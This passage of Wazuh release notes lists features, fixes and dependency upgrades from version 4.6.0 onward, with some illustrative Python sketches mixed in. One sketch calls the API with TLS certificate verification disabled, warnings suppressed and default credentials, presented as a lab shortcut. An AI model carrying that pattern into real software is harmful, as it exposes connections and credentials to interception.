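To illustrate the new update-check endpoint referenced in item #19952 above, here is a minimal Python sketch that authenticates and queries GET /manager/version/check. The host, port, and credentials are placeholder assumptions, the authentication step follows the standard Wazuh server API flow, and the response is simply printed rather than assuming a particular schema.

  import requests
  import urllib3

  WAZUH_API = "https://localhost:55000"   # placeholder host and port
  USER, PASSWORD = "wazuh", "wazuh"       # placeholder credentials

  urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

  # Standard Wazuh server API authentication: basic credentials for a JWT.
  auth = requests.post(
      f"{WAZUH_API}/security/user/authenticate",
      auth=(USER, PASSWORD),
      verify=False,  # self-signed certificates are common in lab setups
  )
  auth.raise_for_status()
  token = auth.json()["data"]["token"]

  # Query the update check endpoint introduced in this release and print the
  # raw response.
  response = requests.get(
      f"{WAZUH_API}/manager/version/check",
      headers={"Authorization": f"Bearer {token}"},
      verify=False,
  )
  print(response.status_code)
  print(response.json())
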
Ruleset
  • #19528 Added rules to detect IcedID attacks.

  • #17780 Added new SCA policy for Amazon Linux 2023.

  • #18721 Revised SCA policy for Ubuntu Linux 18.04.

  • #17515 Revised SCA policy for Ubuntu Linux 22.04.

  • #18440 Revised SCA policy for Red Hat Enterprise Linux 7.

  • #17770 Revised SCA policy for Red Hat Enterprise Linux 8.

  • #17412 Revised SCA policy for Red Hat Enterprise Linux 9.

  • #17624 Revised SCA policy for CentOS 7.

  • #18439 Revised SCA policy for CentOS 8.

  • #18010 Revised SCA policy for Debian 8.

  • #17922 Revised SCA policy for Debian 10.

  • #18695 Revised SCA policy for Amazon Linux 2.

  • #18985 Revised SCA policy for SUSE Linux Enterprise 15.

  • #19037 Revised SCA policy for macOS 13.0 Ventura.

  • #19515 Revised SCA policy for Microsoft Windows 10 Enterprise.

  • #20044 Revised SCA policy for Microsoft Windows 11 Enterprise.

  • #17518 Updated MITRE DB to v13.1.

Other
  • #20003 Upgraded embedded Python version to 3.10.13.

  • #23112 Upgraded external aiohttp library dependency version to 3.9.5.

  • #22221 Upgraded external cryptography library dependency version to 42.0.4.

  • #21710 Upgraded external curl library dependency version to 8.5.0.

  • #20003 Upgraded external grpcio library dependency version to 1.58.0.

  • #23112 Upgraded external idna library dependency version to 3.7.

  • #21684 Upgraded external Jinja2 library dependency version to 3.1.3.

  • #21710 Upgraded external libarchive library dependency version to 3.7.2.

  • #20003 Upgraded external numpy library dependency version to 1.26.0.

  • #21710 Upgraded external pcre2 library dependency version to 10.42.

  • #20493 Upgraded external pyarrow library dependency version to 14.0.1.

  • #21710 Upgraded external rpm library dependency version to 4.18.2.

  • #20741 Upgraded external SQLAlchemy library dependency version to 2.0.23.

  • #21710 Upgraded external sqlite library dependency version to 3.45.0.

  • #20630 Upgraded external urllib3 library dependency version to 1.26.18.

  • #21710 Upgraded external zlib library dependency version to 1.3.1.

  • #21710 Added external lua library dependency version 5.3.6.

  • #21749 Added external PyJWT library dependency version 2.8.0.

  • #21749 Removed external python-jose and ecdsa library dependencies.

Dashboard plugin
  • #5791 Added remember server address check.

  • #6093 Added a notification about new Wazuh updates and a button to check their availability. #6256 #6328

  • #6083 Added the ssl_agent_ca configuration to the SSL Settings form.

  • #5896 Added global vulnerabilities dashboards.

  • #5840 Added an agent selector to the agent view.

  • #5840 Moved the Wazuh menu into the side menu. #6226 #6423 #6510 #6591

  • #5840 Removed the disabled_roles and customization.logo.sidebar settings.

  • #5840 Removed module visibility configuration and removed the extensions.* settings.

  • #6035 Updated all dashboard visualization definitions. #6632 #6690

  • #6067 Reorganized tabs order in all modules.

  • #6174 Removed the implicit filter of WQL language of the search bar UI.

  • #6373 Changed the API configuration title to API Connections.

  • #6366 Removed Compilation date field from the Status view.

  • #6361 Removed WAZUH_REGISTRATION_SERVER variable from Windows agent deployment command.

  • #6354 Added a dash character and a tooltip element to Run as in the API configuration table to indicate it's been disabled.

  • #6364 Added tooltip element to Most active agent in Details in the Endpoint summary view and renamed a label element. #6421

  • #6379 Changed overview home top KPIs. #6408 #6569

  • #6341 Removed notice of old Discover deprecation.

  • #6492 Updated the PDF report year number to 2024.

  • #6702 Adjusted font style of Endpoints summary KPIs, Index pattern, and API selectors, as well as adjusted the Dev Tools column widths.

Packages
  • #2332 Added check into the installation assistant to prevent the use of public IP addresses.

  • #2365 Removed the postProvision.sh script. It's no longer used in OVA generation.

  • #2364 Added curl error messages in downloads.

  • #2469 Improved debug output in the installation assistant.

  • #2557 Added SCA policy for Amazon Linux 2023 in SPECS.

  • #2558 Wazuh password tool now recognizes UI created users.

  • #2562 Bumped Wazuh indexer to OpenSearch 2.10.0.

  • #2563 Bumped Wazuh dashboard to OpenSearch Dashboards 2.10.0.

  • #2577 Added APT and YUM lock logic to the Wazuh installation assistant.

  • #2164 Deprecated CentOS 6 and Debian 7 for the Wazuh manager compilation, while still supporting them in the Wazuh agent compilation.

  • #2588 Added logic to the installation assistant to check for clean Wazuh central components removal.

  • #2615 Added branding images to the header of Wazuh dashboard.

  • #2696 Updated Filebeat module version to 0.4 in Wazuh installation assistant.

  • #2695 Added content database in RPM and DEB packages.

  • #2669 Upgraded botocore dependency in WPK package Docker containers.

  • #2738 Added xz utils as requirement.

  • #2777 Added support for refactored vulnerability detector in the installation assistant.

  • #2797 The Wazuh installation assistant now uses 127.0.0.1 instead of localhost in the Wazuh dashboard configuration. #2808

  • #2801 Added check into the installation assistant to ensure sudo package is installed.

  • #2802 Added the Wazuh keystore functionality to the passwords tool.

  • #2809 Upgraded scripts to support building Wazuh with OpenSSL 3.0.

  • #2784 Added rollback and exit in case the Wazuh indexer security admin fails.

  • #2804 Added the keystore tool for both RPM and DEB manager packages creation. #2802

  • #2798 Added compression for the Wazuh manager due to the inclusion of Vulnerability Detection databases.

  • #2796 Simplified the Wazuh dashboard help menu entries.

  • #2792 Improved certificates generation output when using the Wazuh Installation Assistant and the Wazuh Certs Tool.

  • #2891 Skipped certificate validation for CentOS 5 package generation.

  • #2890 Updated the file permissions of vulnerability detection-related directories.

  • #2966 Added Ubuntu 24 support to the Wazuh installation assistant.

  • #2422 Added the possibility of registering the localhost domain in the installation assistant and in the cert-tool.

  • #2408 Added new AWS files to Solaris SPECS.

  • #2553 Added new role to grant ISM API permissions.

  • #2578 Changed the order of Explore category and Indexer/dashboard management title on dashboard.

  • #2582 Added the ISM init script to the Wazuh indexer package.

  • #2584 Added ISM script in installation assistant.

  • #2586 Moved ISM scripts from package to base.

  • #2590 Extended indexer-init.sh to accept arguments.

  • #2592 Updated the initialize cluster script in the offline installation workflow.

  • #2598 Updated min_doc_count value.

  • #2606 Improved ISM init script.

  • #2609 Adapted wazuhapp and Wazuh dashboard to install the Wazuh CheckUpdates and Core plugins.

  • #2639 Changed check yum lock function.

  • #2653 Collapsed initially the application categories in the side menu of Wazuh dashboard.

  • #2687 Added common_checkAptLock function.

  • #2700 Updated indexer-ism-init.sh.

  • #2711 Ensured config is present in ossec.conf after upgrade via rpm.

  • #2712 Added wazuh-filebeat template to Wazuh indexer.

  • #2713 Removed wazuh-template json.

  • #2726 Updated indexer-ism-init.sh.

  • #2733 Updated indexer-ism-init.sh.

  • #2742 Vulnerability detection refactor.

  • #2748 Removed flag --download-content.

  • #2782 Split CentOS and RHEL check.

  • #2789 Updated Wazuh favicon for Safari.

  • #2795 Replaced category management description.

  • #2807 Silenced sudo package check.

  • #2821 Removed debug variable in Admin certificate generation.

  • #2822 Stopped decompressing the .tar.xz file and removed the xz dependency.

  • #2827 Added a step to restore the ossec.conf file in the backup/restore scripts.

  • #2838 Removed download-content.sh and download.rules files.

Resolved issues

This release resolves known issues as the following:

Manager
  • #17886 Updated cluster connection cleanup to remove temporary files when the connection between a worker and a master is broken.

  • #23371 Added a mechanism to prevent cluster errors from an expected wazuh-db exception.

  • #23216 Fixed a race condition when creating agent database files from a template.

Agent
  • #16839 Fixed process path retrieval in Syscollector on Windows XP.

  • #16056 Fixed the OS version detection on Alpine Linux.

  • #18642 Fixed Solaris 10 name not showing in the dashboard.

  • #21932 Fixed an error in macOS Ventura compilation from sources.

  • #23532 Fixed PyPI package gathering on macOS Sonoma.

RESTful API
  • #20527 Fixed a warning from SQLAlchemy involving detached Roles instances in RBAC.

  • #23120 Fixed an issue in GET /manager/configuration where only the last of multiple <ignore> items in the configuration file was displayed.

Dashboard plugin
  • #5840 Fixed a problem with the agent menu header when the side menu is docked.

  • #6102 Fixed how the query filters apply on the Security Alerts table.

  • #6177 Fixed exception in agent view when an agent doesn't have policies.

  • #6177 Fixed exception in Inventory when agents don't have operating system information.

  • #6177 Fixed pinned agent state in URL.

  • #6234 Fixed invalid date format in About and Agents views.

  • #6305 Fixed issue with script to install agents on macOS if using the registration password deployment variable.

  • #6327 Fixed an issue preventing the use of a hostname as the Server address in Deploy New Agent.

  • #6342 Fixed wrong Queue Usage values in Server management > Statistics.

  • #6352 Fixed Statistics view errors when cluster mode is disabled.

  • #6374 Fixed the help menu, to be consistent and avoid duplication.

  • #6378 Fixed the axis label visual bug from dashboards.

  • #6431 Fixed an error displayed when clicking Refresh in MITRE ATT&CK if the Wazuh indexer service is down.

  • #6484 Fixed minor style issues. #6489 #6587

  • #6617 Fixed error when clicking Log collection in Configuration of a disconnected agent.

  • #6333 Fixed a typo in an abbreviation for Fully Qualified Domain Name.

  • #6553 Fixed "View alerts of this Rule" link.

Packages
  • #2381 Fixed DNS validation in the installation assistant.

  • #2401 Fixed debug redirection in the installation assistant.

  • #2850 Fixed certificates generation output for certificates not created.

  • #2906 Moved up the hardware check of the installation assistant. Now dependencies don't get installed if it fails.

  • #2380 Fixed source_branch variable in master branch.

  • #2535 Fixed mkdir wazuh-install-files error.

  • #2560 Fixed internalusers-backup directory owner and permissions.

  • #2585 Fixed bug with -i option.

  • #2646 Fixed wazuh-indexer.spec duplicated information.

  • #2723 Fixed Filebeat template URL in Wazuh indexer.

  • #2796 Fixed duplicated help menu.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.7.5 Release notes - 30 May 2024

This section lists the changes in version 4.7.5. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes the following new features and enhancements:

Wazuh manager
  • #23441 Added a database endpoint to recalculate the hash of agent groups.

Wazuh dashboard
  • #6687 Added sanitization to custom branding SVG files.

Resolved issues

This release resolves the following known issues:

Wazuh manager
  • #23447 Fixed an issue in a cluster task where full group synchronization was constantly triggered.

  • #23216 Fixed a race condition when creating agent database files from a template.

Wazuh agent
  • #23468 Fixed a segmentation fault in the logcollector multiline-regex configuration.

  • #23543 Fixed a crash in the FIM module when processing paths with non-UTF-8 characters.

Wazuh dashboard
  • #6718 Fixed a missing space in the macOS agent installation command when a password is required.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.4 Release notes - 29 April 2024

This section lists the changes in version 4.7.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves the following known issues:

Wazuh manager
  • #22933 Fixed wazuh-db not clearing labels from deleted agents.

  • #22994 Improved stability by ensuring workers resume normal operations even during master node downtime.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.3 Release notes - 4 March 2024

This section lists the changes in version 4.7.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves the following known issues:

Wazuh manager
  • #21997 Resolved a transitive mutex locking issue in wazuh-db that was impacting performance.

  • #21977 Optimized Wazuh DB internal SQL queries by tuning database indexes to improve performance.

Wazuh dashboard
  • #6458 Fixed an error when uploading CDB lists.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.2 Release notes - 10 January 2024

This section lists the changes in version 4.7.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes the following new features and enhancements:

Wazuh manager
  • #21142 Added minimum time constraint of 1 hour for downloading the Vulnerability Detector feed.

Wazuh agent
  • #20638 Added request timeouts for the external and cloud integrations. This prevents indefinite waiting for a response.
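
As a minimal illustration of the request-timeout change above (this is not Wazuh's actual integration code; the URL is a placeholder), a timeout in the Python requests library bounds how long an outbound call may block instead of waiting indefinitely:

```python
import requests

FEED_URL = "https://example.com/api/logs"  # hypothetical endpoint for illustration

def fetch_events(url: str = FEED_URL) -> list:
    """Fetch events, failing fast instead of waiting indefinitely."""
    try:
        # (connect timeout, read timeout) in seconds: the call raises
        # requests.exceptions.Timeout instead of hanging forever.
        response = requests.get(url, timeout=(5, 30))
        response.raise_for_status()
        return response.json()
    except requests.exceptions.Timeout:
        # A bounded failure the caller can log and retry later.
        return []
```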

Ruleset
  • #17565 Added new SCA policy for Debian 12 systems.

Other
  • #20798 Upgraded external aiohttp library dependency to version 3.9.1 to address a security vulnerability.

Wazuh dashboard
  • #6191 Added Hostname and Board Serial information to Agents > Inventory data.

  • #6208 Added contextual information to the deploy agent steps.

Packages
  • #2670 Removed installed dependencies that were part of the Wazuh installation assistant. This ensures a clean post-installation state.

  • #2677 Removed gnupg package as RPM dependency in the Wazuh installation assistant.

  • #2693 Added Debian 12 SCA files.

Resolved issues

This release resolves the following known issues:

Wazuh manager
  • #21011 wazuh-remoted now logs the warning regarding invalid message size from agents in hex format.

  • #20658 Fixed a bug within the Windows Eventchannel decoder to ensure proper handling of Unicode characters.

  • #20735 Fixed data validation for decoding Windows Eventchannel XML input strings.

Wazuh agent
  • #20656 Implemented validation for the format of the IP address parameter in the host_deny active response.

  • #20594 Fixed a bug in the Windows agent that might lead it to crash when gathering forwarded Windows events.

  • #20447 Fixed an issue with the profile prefix when parsing AWS configuration profiles.

  • #20660 Fixed parsing and validation for the AWS regions argument, expanding the AWS regions list accordingly.

Ruleset
  • #20663 Updated AWS Macie rules to show relevant fields in alert details.

Wazuh dashboard
  • #6185 Fixed the Agents preview page load when there are no registered agents.

  • #6206 #6213 Changed the endpoint to get the Wazuh server auth configuration to manager/configuration/auth/auth.

  • #6224 Fixed an error when navigating back to an agent in some scenarios.

Packages
  • #2667 Fixed a warning message when generating certificates.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.1 Release notes - 20 December 2023

This section lists the changes in version 4.7.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes the following new features and enhancements:

Agent
  • #20616 Improved WPK upgrade scripts to ensure safe execution and backup generation.

Other
  • #20149 Upgraded external certifi library dependency version to 2023.07.22.

  • #20149 Upgraded external requests library dependency version to 2.31.0.

  • #18800 Upgraded embedded Python version to 3.9.18.

Packages
  • #2559 Updated Wazuh assistant help text for offline download option.

  • #2627 Updated error message for CentOS GPG key import failure.

  • #2624 Added macOS 14 Sonoma SCA files.

Resolved issues

This release resolves the following known issues:

Manager
  • #20178 Fixed a thread lock bug that slowed down wazuh-db performance.

  • #20386 Fixed a bug in Vulnerability Detector that skipped vulnerabilities for Windows 11 21H2.

  • #5941 The installer now updates the merged.mg file permissions on upgrade.

  • #19993 Fixed an insecure request warning in the Shuffle integration.

  • #19888 Fixed a bug that corrupted cluster logs when rotated.

  • #20580 Fixed a bug causing the Canonical feed parser to fail in Vulnerability Detector.

Agent
  • #20332 Fixed a bug that prevented the local IP address from appearing in the port inventory from macOS agents.

  • #20180 Fixed the default Logcollector settings on macOS to collect logs out-of-the-box.

  • #20169 Fixed a bug in the FIM decoder at wazuh-analysisd that ignored Windows Registry events from agents earlier than 4.6.0.

  • #20250 Fixed multiple bugs in the Syscollector decoder at wazuh-analysisd that did not sanitize the input data properly.

  • #20284 Added the pyarrow_hotfix dependency to fix the pyarrow CVE-2023-47248 vulnerability in the AWS integration (see the sketch after this list).

  • #20598 Fixed a bug that allowed two simultaneous updates to occur through WPK.
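
For context on the pyarrow_hotfix entry (#20284) above: the package is designed so that simply importing it blocks the unsafe deserialization path in affected pyarrow versions. A minimal sketch of how a consumer might apply it, assuming pyarrow and pyarrow_hotfix are installed (this is not the Wazuh AWS integration's code):

```python
import pyarrow as pa
import pyarrow_hotfix  # noqa: F401  -- importing it is enough to apply the mitigation

# Regular pyarrow usage keeps working; only the vulnerable
# deserialization behavior targeted by CVE-2023-47248 is disabled.
table = pa.table({"ip": ["10.0.0.1", "10.0.0.2"], "bytes_sent": [100, 250]})
print(table.num_rows)
```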

RESTful API
  • #18423 Fixed inconsistencies in the behavior of the q parameter of some endpoints.

  • #18495 Fixed a bug in the q parameter of the GET /groups/{group_id}/agents endpoint.

  • #19533 Fixed a bug in the regular expression used to reject non-ASCII characters in some endpoints.

Wazuh dashboard
  • #6076 Fixed a problem when using non-Latin characters in the username.

  • #6104 Fixed a UI crash on retrieving the log collection configuration for macOS agents.

  • #6105 Fixed incorrect validation of the agent name on the Deploy new agent window.

  • #6184 Fixed missing columns in the agent table of Groups.

Packages
  • #2561 Fixed network.host fetching in the Password tool. A commented line like #network.host: "XXX.XXX.XXX.XXX" is now ignored (see the sketch after this list).

  • #2493 Fixed an issue where Intel64 macOS packages failed to install on ARM-based machines.

  • #2611 Fixed a file permissions issue in merged.mg files when updating a manager using packages update.
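
To illustrate the #2561 fix in generic terms: a commented-out network.host line must not be picked up when reading the indexer configuration. The following is a rough, standalone Python sketch of that parsing rule, not the actual passwords-tool code (which is a shell script); the sample text is made up:

```python
import re
from typing import Optional

def get_network_host(config_text: str) -> Optional[str]:
    """Return the value of network.host, ignoring commented lines."""
    for line in config_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("#"):
            continue  # a line such as '#network.host: "1.2.3.4"' must be skipped
        match = re.match(r'network\.host:\s*"?([^"\s]+)"?', stripped)
        if match:
            return match.group(1)
    return None

sample = '#network.host: "10.0.0.1"\nnetwork.host: "192.168.1.10"\n'
print(get_network_host(sample))  # -> 192.168.1.10
```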

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.0 Release notes - 27 November 2023

This section lists the changes in version 4.7.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #18026 Added native Maltiverse integration. Wazuh now leverages the Maltiverse API to enrich alerts. This enhancement supplements alert details with threat intelligence data following the Elastic Common Schema (ECS) standard. Acknowledgments to David Gil (@dgilm).

  • #16090 Added an option to customize the Slack integration.

  • #16008 An unnecessary sanity check related to Syscollector has been removed from wazuh-db.

  • #18570 Added support for Amazon Linux 2023 in Vulnerability Detector.

  • #20367 The manager now rejects agents with a higher version by default.

Agent
  • #17951 Added support for Custom AWS Logs in Buckets via AWS SQS. This enhancement improves visibility and troubleshooting in AWS environments.

  • #15582 Added geolocation for aws.data.client_ip field. The new GeoIP feature enables tracking of geographical locations of AWS ALB client IP addresses. This addition enhances visibility into network traffic and security monitoring. Acknowledgements to Arran Rhodes @rh0dy.

  • #15699 Added package inventory support for Alpine Linux in Syscollector.

  • #16117 Added package inventory support for MacPorts package manager in Syscollector. This enhancement improves compatibility with macOS.

  • #17982 Added package inventory support for Python PYPI and Node.js in Syscollector.

  • #15000 Added process information to the open ports inventory in Syscollector. This addition enhances ports inventory capabilities for better management and tracking on Linux systems.

  • #17966 The shared modules code has been sanitized according to the convention.

  • #18006 The package inventory internal messages have been modified to honor the schema compliance.

  • #20360 Added clarification to the agent connection log. The agent must connect to a manager of the same or higher version.

Wazuh dashboard
  • #5680 Added the Status detail column in the Agents table.

  • #5738 The agent registration wizard now effectively manages special characters in passwords.

  • #5636 Changed the Network ports table columns for Linux agents.

  • #5707 Changed Timelion-type displays in the Management > Statistics section to line-type displays.

  • #5747 Removed views in JSON and XML formats from the Management settings.

RESTful API
  • #19726 Added new status_code field to GET /agents response.

  • #20126 Deprecated the following API endpoints:

    • PUT /vulnerability

    • GET /vulnerability/{agent_id}

    • GET /vulnerability/{agent_id}/last_scan

    • GET /vulnerability/{agent_id}/summary/{field}

Packages
  • #2568 Updated links to wazuh-dashboard-plugins repository.

  • #2555 Added firewall validation to the installation assistant.

Resolved issues

This release resolves the following known issues:

Manager
  • #16683 Fixed an unexpected cluster error when a worker gets restarted.

  • #16681 Fixed an issue that let the manager validate wrong XML configurations.

  • #19869 Fixed the default value for the multiarch field in syscollector packages.

  • #20081 Fixed WPK rollback rebooting the host in the Windows agent.

Agent
  • #17006 Fixed detection of osquery 5.4.0+ running outside the integration.

  • #16089 Fixed vendor data in package inventory for Brew packages on macOS.

  • #19811 Improved reliability of the signature verification mechanism.

RESTful API
  • #16489 Addressed error handling for non-UTF-8 encoded file readings.

  • #16914 Resolved an issue in the WazuhException class that disrupted the API executor subprocess.

  • #16918 Corrected an empty value problem in the API specification key.

Other
  • #17040 Fixed the signature of the internal function OSHash_GetIndex().

Wazuh dashboard
  • #5591 Fixed a problem with new or missing columns in the Agents table.

  • #5676 Fixed the color of the agent name in the groups section in dark mode.

  • #5597 Fixed the propagation event so that the flyout data, in the decoders, does not change when the button is pressed.

  • #5631 Fixed the tooltips of the tables in the Security section, and removed unnecessary requests.

Packages
  • #2523 Fixed a wrong condition when generating the RPM Wazuh indexer package with an existent base file.

Changelogs

More details about these changes are provided in the changelog of each component:

4.6.0 Release notes - 31 October 2023

This section lists the changes in version 4.6.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights
  • Included support for the Microsoft Graph Security API. This addition enables users to integrate and fetch security alerts from multiple Microsoft products. It provides a cohesive security perspective.

  • Added the Webhook input API endpoint. It paves the way to dynamic integrations and real-time responses. It enhances automation capabilities and responsiveness.

  • Incorporated Office 365 support for GCC/GCCH. This addition extends monitoring coverage for organizations with a strong reliance on Office 365, particularly in GCC/GCCH environments. It ensures comprehensive compliance and security.

  • Support for AlmaLinux OS, Debian 12, and Amazon Linux 2022 is now included in Vulnerability Detector. Expanding support to newer OS versions demonstrates the platform adaptability to the evolving Linux ecosystem. It also highlights our commitment to user safety across diverse environments.

  • Included PCRE2 support in Security Configuration Assessment (SCA). This addition provides users with a more powerful pattern-matching tool. It enhances the software auditing and compliance capabilities.

Breaking changes
  • The integration methods for Splunk, OpenSearch, and Elastic Stack have been changed. Please refer to the Integrations guide to learn more.

What's new

This release includes the following new features and enhancements:

Wazuh manager
  • #13559 wazuh-authd can now generate X509 certificates.

  • #13797 Introduced a new CLI to manage features related to the Wazuh API RBAC resources.

  • #13034 Added support for Amazon Linux 2022 in Vulnerability Detector.

  • #16343 Added support for Alma Linux in Vulnerability Detector.

  • #18542 Added support for Debian 12 in Vulnerability Detector.

  • #14953 Added a mechanism in wazuh-db to identify fragmentation and perform vacuum (a conceptual sketch follows this list).

  • #19956 Adjusted the default settings for wazuh-db to perform database auto-vacuum more often.

  • #18333 Added an option to set whether the manager should ban newer agents.

  • #15661 Added mechanism to prevent Wazuh agents connections to lower manager versions.

  • #14659 wazuh-remoted now checks the size of the files to avoid malformed merged.mg.

  • #14024 Added a limit option for the Rsync dispatch queue size.

  • #14026 Added a limit option for the Rsync thread pool.

  • #14549 wazuh-authd now shows a warning when deprecated forcing options are present in the configuration.

  • #14804 The agent now notifies the manager when Active Response fails to run netsh.

  • #13906 Use a new broadcast system to send agent group information from the master node of a cluster.

  • #15220 Changed cluster send_request method so that timeouts are treated as exceptions and not as responses.

  • #13065 Refactored methods responsible for file synchronization within the cluster.

  • #16065 Changed schema constraints for sys_hwinfo table.

  • #15709 The Auth process does not start when the registration password is empty.

  • #19400 Changed the message type for GetSecurityInfo from error to debug.
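
Regarding the wazuh-db fragmentation and auto-vacuum entries above (#14953 and #19956), the general idea in SQLite terms is to compare free pages against total pages and run VACUUM once the ratio crosses a threshold. The following is a conceptual, standalone sketch using Python's standard sqlite3 module, not wazuh-db's actual implementation; the threshold value is arbitrary:

```python
import sqlite3

def vacuum_if_fragmented(db_path: str, threshold: float = 0.1) -> bool:
    """Run VACUUM when the share of free pages exceeds the threshold."""
    conn = sqlite3.connect(db_path)
    try:
        free_pages = conn.execute("PRAGMA freelist_count").fetchone()[0]
        total_pages = conn.execute("PRAGMA page_count").fetchone()[0]
        fragmentation = free_pages / total_pages if total_pages else 0.0
        if fragmentation > threshold:
            conn.execute("VACUUM")  # rebuilds the file, reclaiming free pages
            return True
        return False
    finally:
        conn.close()

# Example: vacuum_if_fragmented("/tmp/example.db")
```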

Agent
  • #15226 Added GuardDuty Native support to the AWS integration.

  • #14768 Added --prefix parameter to Azure Storage integration.

  • #16493 Added validations for empty and invalid values in AWS integration.

  • #13573 Added new unit tests for GCloud integration and increased coverage to 99%.

  • #14104 Added new unit tests for Azure Storage integration and increased coverage to 99%.

  • #14177 Added new unit tests for Docker Listener integration.

  • #18116 Added support for Microsoft Graph security API. Thanks to Bryce Shurts (@S-Bryce).

  • #15852 Added wildcard support in FIM Windows registers.

  • #15973 Added wildcards support for folders in the localfile configuration on Windows.

  • #14782 Added new settings ignore and restrict to logcollector.

  • #12745 Added RSync and DBSync to FIM.

  • #17124 Added PCRE2 regex for SCA policies.

  • #14763 Added mechanism to detect policy changes.

  • #13264 FIM option fim_check_ignore now applies to files and directories.

  • #16531 Changed AWS integration to take into account the user configuration found in the .aws/config file.

  • #14537 Changed the calculation of timestamps in AWS and Azure modules by using UTC timezone.

  • #15009 Changed the AWS integration to only show the Skipping file with another prefix message in debug mode.

  • #14999 Changed debug level required to display CloudWatch Logs event messages.

  • #17447 Changed syscollector database default permissions.

  • #17161 Changed agent IP lookup algorithm.

  • #14499 Changed InstallDate origin in Windows installed programs.

  • #14524 Enhanced clarity of certain error messages in the AWS integration for better exception tracing.

  • #13420 Improved external integrations SQLite queries.

  • #16325 Improved items iteration for Config and VPCFlow AWS integrations.

  • #14784 Unit tests have been added to the shared JSON handling library.

  • #14476 Unit tests have been added to the shared SQLite handling library.

  • #15032 Improved command to change user and group from version 4.2.x to 4.x.x.

  • #15647 Changed the internal value of the open_attemps configuration.

  • #13878 The unused option local_ip for agent configuration has been deleted.

  • #14684 Removed unused migration functionality from the AWS integration.

  • #17655 Deleted definitions of repeated classes in the AWS integration.

  • #15031 Removed duplicate methods in AWSBucket and reuse inherited ones from WazuhIntegration.

  • #16547 Added support for Office365 MS/Azure Government Community Cloud (GCC) and Government Community Cloud High (GCCH) API. Thanks to Bryce Shurts (@S-Bryce).

  • #19758 Reduced the default FIM event throughput to 50 EPS.

RESTful API
  • #17670 Added POST /events API endpoint to ingest logs through the API.

  • #17865 Added query, select and distinct parameters to multiple endpoints.

  • #13919 Added a new upgrade and migration mechanism for the RBAC database.

  • #13654 Added a new API configuration option to rotate log files based on a given size (a conceptual sketch follows this list).

  • #15994 Added relative_dirname parameter to GET, PUT and DELETE methods of the /decoder/files/{filename} and /rule/files/{filename} endpoints.

  • #18212 Added a new configuration option to disable uploading configurations containing the new allow_higher_version setting.

  • #13615 Added API integration tests documentation.

  • #13646 Changed the API's response status code for Wazuh cluster errors from 400 to 500.

  • #15934 Removed legacy code related to agent databases in /var/agents/db.

  • #19001 Changed Operational API error messages to include additional information.
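
As a conceptual illustration of size-based log rotation mentioned in #13654 above, the Python standard library's rotating handler behaves the same way: once the active file reaches a size limit, it is rolled over and a bounded number of old files is kept. This is not the Wazuh API's own mechanism; the file name and sizes are placeholders:

```python
import logging
from logging.handlers import RotatingFileHandler

# Rotate once the active file reaches ~5 MB, keeping 3 old files:
# api.log, api.log.1, api.log.2, api.log.3
handler = RotatingFileHandler("api.log", maxBytes=5 * 1024 * 1024, backupCount=3)
handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s"))

logger = logging.getLogger("api")
logger.setLevel(logging.INFO)
logger.addHandler(handler)
logger.info("request handled")
```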

Ruleset
  • #14138 The SSHD decoder has been improved to catch disconnection events.

Wazuh dashboard
  • #5197 #5274 #5298 #5409 Added rel="noopener noreferrer" in documentation links.

  • #5203 Added ignore and restrict options to Syslog configuration.

  • #5376 Added the extensions.github and extensions.office settings to the default configuration file.

  • #4163 Added new global error treatment (client-side).

  • #5519 Added new CLI to generate API data from specification file.

  • #5551 Added specific RBAC permissions to the Security section.

  • #5443 Added Refresh and Export formatted button to panels in Agents > Inventory data.

  • #5491 Added Refresh and Export formatted buttons to Management > Cluster > Nodes.

  • #5201 Changed the regular expression in RBAC.

  • #5384 Migrated the timeFilter, metaFields, and maxBuckets health checks inside the pattern check.

  • #5485 Changed the query to search for an agent in Management > Configuration.

  • #5476 Changed the search bar in management/log to the one used in the rest of the app.

  • #5457 Changed the design of the wizard to add agents.

  • #5363 #5442 #5443 #5444 #5445 #5447 #5452 #5491 #5785 Introduced a new, enhanced search bar. It adds new features to all the searchable tables, leveraging the Wazuh API. It also addresses some of the issues found in the previous version.

  • #5451 Removed deprecated request and code in agent's view.

  • #5453 Removed unnecessary dashboard queries caused by the deploy agent view.

  • #5500 Removed repeated and unnecessary requests in the Security section.

  • #5519 Removed scripts to generate API data from live Wazuh manager.

  • #5532 Removed the pretty parameter from cron job requests.

  • #5528 Removed unnecessary requests in the Management > Status section.

  • #5485 Removed obsolete code that caused duplicate requests to the API in Management.

  • #5592 Removed unused embedded jquery-ui.

Resolved issues

This release resolves the following known issues:

Wazuh manager
  • #13979 Fixed wazuh-remoted not updating total bytes sent in UDP.

  • #14356 Fixed translation of packages with a missing version in CPE Helper for Vulnerability Detector.

  • #14174 Fixed undefined behavior issues in Vulnerability Detector unit tests.

  • #14019 Fixed a permission error when producing FIM alerts.

  • #15164 Fixed memory leaks in wazuh-authd.

  • #14763 Fixed Audit policy change detection in FIM for Windows.

  • #14408 Fixed the origin_module variable value when sending API or framework messages to core sockets.

  • #15715 Fixed an issue where an erroneous tag appeared in the cluster logs.

  • #15250 Fixed the log error displayed when there's a duplicate worker node name within a cluster.

  • #15487 Resolved an issue in the agent_upgrade CLI when used from worker nodes.

  • #18047 Fixed an error in the agent_upgrade CLI when displaying the upgrade result.

  • #15277 Fixed an error in which the connection with the cluster was broken in local clients for not sending keepalive messages.

  • #15298 Fixed an error in which exceptions were not correctly handled when the dapi_err command could not be sent to peers.

